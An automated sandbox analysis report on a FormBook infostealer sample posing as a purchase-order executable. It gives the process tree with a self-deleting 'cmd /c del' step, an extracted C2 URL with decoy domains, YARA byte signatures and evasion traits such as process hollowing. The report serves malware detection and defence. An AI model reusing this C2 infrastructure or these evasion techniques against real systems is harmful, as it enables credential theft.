Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO45937008ADENGY.exe

Overview

General Information

Sample Name:PO45937008ADENGY.exe
Analysis ID:383974
MD5:47ebf3893d8d6db4add1b87ad75495e4
SHA1:a90970359da16dfbcf89648f7a38fb75707181b3
SHA256:ee54b187c42f159bfba469c4b8c5ba0a85afeb802ea7eacaf400ccb38f7183af
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w10x64
  • PO45937008ADENGY.exe (PID: 7024 cmdline: 'C:\Users\user\Desktop\PO45937008ADENGY.exe' MD5: 47EBF3893D8D6DB4ADD1B87AD75495E4)
    • cmd.exe (PID: 3684 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 1320 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • PO45937008ADENGY.exe (PID: 6448 cmdline: C:\Users\user\Desktop\PO45937008ADENGY.exe MD5: 47EBF3893D8D6DB4ADD1B87AD75495E4)
    • PO45937008ADENGY.exe (PID: 612 cmdline: C:\Users\user\Desktop\PO45937008ADENGY.exe MD5: 47EBF3893D8D6DB4ADD1B87AD75495E4)
    • PO45937008ADENGY.exe (PID: 6644 cmdline: C:\Users\user\Desktop\PO45937008ADENGY.exe MD5: 47EBF3893D8D6DB4ADD1B87AD75495E4)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6316 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5900 cmdline: /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 1668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hnchotels.com/mb7q/"], "decoy": ["thezensub.com", "wapedir.com", "itt.xyz", "mindframediscovery.com", "sitesolved.net", "beyju.store", "belatopapparel.xyz", "ridgefitct.com", "huanb.com", "brustwarzentattoo.com", "jlasoluciones.club", "sinoagrifcf.com", "theskineditco.com", "ccsdinstructer.com", "wealththinker.com", "pradnyanamaya.com", "szmsbk.com", "meezingo.com", "ivyshermanboutique.com", "tkbeads.com", "network70.com", "viralofilia.com", "eversteve.com", "softballlyfe.com", "fashionpulos.com", "myfashionest.com", "thelandcle.com", "xuuxacademy.com", "shopbijousecrets.com", "ynlklwsx.icu", "mtasa.blue", "covid19officers.com", "bookitstaugustine.com", "kuppers.info", "therapeuticsmile.com", "bestsocialprograms.com", "alergiaalfrio.com", "hepimizdostuz.com", "shubharambh-gifts.com", "drmellilo.com", "visaad.com", "caseysisters.com", "accessibleageing.com", "tokoryan.online", "databasement.net", "penstockdistillery.com", "payelll.com", "rockinghampress.com", "tuyensinhhaiphong.com", "myrecordsinfo.com", "thegarnetts.vegas", "veganktichen.com", "helpmewithmyenergy.com", "tootywooty.com", "walmartadvisors.com", "atrangii.com", "sceantez.com", "namigwe.art", "davidkellywvhouse6.com", "richardyg.com", "pasouth.com", "theblockparq.com", "merkuryindustries.com", "solidgroundsministries.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.PO45937008ADENGY.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.PO45937008ADENGY.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.PO45937008ADENGY.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        9.2.PO45937008ADENGY.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          9.2.PO45937008ADENGY.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hnchotels.com/mb7q/"], "decoy": ["thezensub.com", "wapedir.com", "itt.xyz", "mindframediscovery.com", "sitesolved.net", "beyju.store", "belatopapparel.xyz", "ridgefitct.com", "huanb.com", "brustwarzentattoo.com", "jlasoluciones.club", "sinoagrifcf.com", "theskineditco.com", "ccsdinstructer.com", "wealththinker.com", "pradnyanamaya.com", "szmsbk.com", "meezingo.com", "ivyshermanboutique.com", "tkbeads.com", "network70.com", "viralofilia.com", "eversteve.com", "softballlyfe.com", "fashionpulos.com", "myfashionest.com", "thelandcle.com", "xuuxacademy.com", "shopbijousecrets.com", "ynlklwsx.icu", "mtasa.blue", "covid19officers.com", "bookitstaugustine.com", "kuppers.info", "therapeuticsmile.com", "bestsocialprograms.com", "alergiaalfrio.com", "hepimizdostuz.com", "shubharambh-gifts.com", "drmellilo.com", "visaad.com", "caseysisters.com", "accessibleageing.com", "tokoryan.online", "databasement.net", "penstockdistillery.com", "payelll.com", "rockinghampress.com", "tuyensinhhaiphong.com", "myrecordsinfo.com", "thegarnetts.vegas", "veganktichen.com", "helpmewithmyenergy.com", "tootywooty.com", "walmartadvisors.com", "atrangii.com", "sceantez.com", "namigwe.art", "davidkellywvhouse6.com", "richardyg.com", "pasouth.com", "theblockparq.com", "merkuryindustries.com", "solidgroundsministries.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO45937008ADENGY.exeVirustotal: Detection: 27%Perma Link
          Source: PO45937008ADENGY.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PO45937008ADENGY.exeJoe Sandbox ML: detected
          Source: 9.2.PO45937008ADENGY.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: unknownHTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.4:49727 version: TLS 1.0
          Source: PO45937008ADENGY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: onfiguration.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.670335958.0000000004C32000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO45937008ADENGY.exe, WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp, wlanext.exe
          Source: Binary string: crypt32.pdb_ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: .ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: schannel.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: WLDP.pdb/ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb< source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: rasapi32.pdb| source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb( source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: CLBCatQ.pdb= source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdbu source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbn source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorsecimpl.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wmswsock.pdb! source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdbn source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbP source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO45937008ADENGY.exe, 00000009.00000003.664621972.0000000001160000.00000004.00000001.sdmp, wlanext.exe, 00000011.00000002.915414593.0000000003A1F000.00000040.00000001.sdmp
          Source: Binary string: ncrypt.pdbk source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbps; source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: imagehlp.pdby source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb_ source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: propsys.pdbm source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: iVisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000D.00000003.670642715.0000000000C51000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: rasman.pdbv source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: .pdb= source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.Core.ni.pdbRSDSD source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb7 source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb! source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: dhcpcsvc6.pdbQ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wlanext.pdb source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
          Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: wUxTheme.pdbs source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: .pdb+ source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: cldapi.pdbC source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdb; source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdbI source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb\F1 source: WER15F6.tmp.dmp.13.dr
          Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
